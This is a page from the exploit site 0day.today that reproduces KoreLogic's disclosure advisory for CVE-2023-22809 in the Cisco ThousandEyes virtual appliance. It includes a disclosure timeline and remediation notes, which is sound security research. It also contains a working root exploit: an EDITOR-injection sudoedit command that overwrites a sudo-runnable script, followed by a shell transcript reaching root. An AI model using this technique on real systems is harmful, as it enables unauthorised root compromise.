0day.today - наибольшая база данных эксплоитов в мире.
![](/img/logo_green.jpg)
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Прочитайте [ соглашение ]
- Прочитайте [ Отправить ] правила
- Посетите страницу [ faq ] page
- [ Зарегистрируйте ] профиль
- Получите [ Gold ]
- Если Вы хотите [ продать ]
- Если Вы хотите [ купить ]
- Если Вы потеряли [ Счет ]
- Любые вопросы [ [email protected] ]
- Страница авторизации
- Страница регистрации
- Страница восстановления
- Страница FAQ
- Страница контактов
- Правила публикации
- Страница с соглашением
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Вы можете связаться с нами по:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification Vulnerability
Автор
Риск
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Категория
Дата добавления
CVE
Платформа
Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit Advisory ID: KL-001-2023-003 Publication Date: 2023.08.17 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt 1. Vulnerability Details Affected Vendor: ThousandEyes Affected Product: ThousandEyes Enterprise Agent Virtual Appliance Affected Version: thousandeyes-va-64-18.04 0.218 Platform: Linux / Ubuntu 18.04 CWE Classification: CWE-1395: Dependency on Vulnerable Third-Party Component CVE ID: CVE-2023-22809 2. Vulnerability Description An unpatched vulnerability in 'sudoedit', allowed by sudo configuration, permits a low-privilege user to modify arbitrary files as root and subsequently execute arbitrary commands as root. 3. Technical Description The ThousandEyes Virtual Appliance is distributed with a restrictive set of commands that can be executed via sudo, without having to provide the password for the 'thousandeyes' account. However, the ability to execute sudoedit of a specific file (/etc/hosts) via sudo is permitted without requiring the password. The sudoedit binary can be abused to allow the modification of any file on the filesystem. This is a known security vulnerability (per https://seclists.org/oss-sec/2023/q1/42), but had not been disclosed for the ThousandEyes Virtual Appliance. This can be abused to allow root-level compromise of the virtual appliance. thousandeyes@thousandeyes-va:~$ id uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare) thousandeyes@thousandeyes-va:~$ sudo -l Matching Defaults entries for thousandeyes on thousandeyes-va: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User thousandeyes may run the following commands on thousandeyes-va: (ALL : ALL) ALL (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent, /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-* (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump Here we see that /usr/local/bin/te-* are executable as root with no password. Even though sudoedit is only permitted to edit /etc/hosts, we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one of those scripts because we can then execute it: thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config /usr/local/bin/te-set-config: Python script, ASCII text executable thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts sudoedit: --: editing files in a writable directory is not permitted 2 files to edit sudoedit: /etc/hosts unchanged thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config /usr/local/bin/te-set-config: ASCII text thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config /bin/bash thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config root@thousandeyes-va:~# id uid=0(root) gid=0(root) groups=0(root) root@thousandeyes-va:~# 4. Mitigation and Remediation Recommendation The vendor has released a version which remediates the described vulnerability. Release notes are available at: https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994 5. Credit This vulnerability was discovered by Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2023.04.26 - KoreLogic submits vulnerability details to Cisco. 2023.04.26 - Cisco acknowledges receipt and the intention to investigate. 2023.05.04 - Cisco notifies KoreLogic that a remediation for this vulnerability is expected to be available within 90 days. 2023.06.30 - 45 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2023.07.11 - Cisco informs KoreLogic that the issue has been remediated in the latest ThousandEyes Virtual Appliance and a Third Party Software Release Note Enclosure will be released 2023.08.16. Cisco provides CVE-2023-22809 to track this vulnerability. 2023.07.24 - 60 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2023.08.16 - Cisco public acknowledgement. 2023.08.17 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2023 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ # 0day.today [2024-07-01] #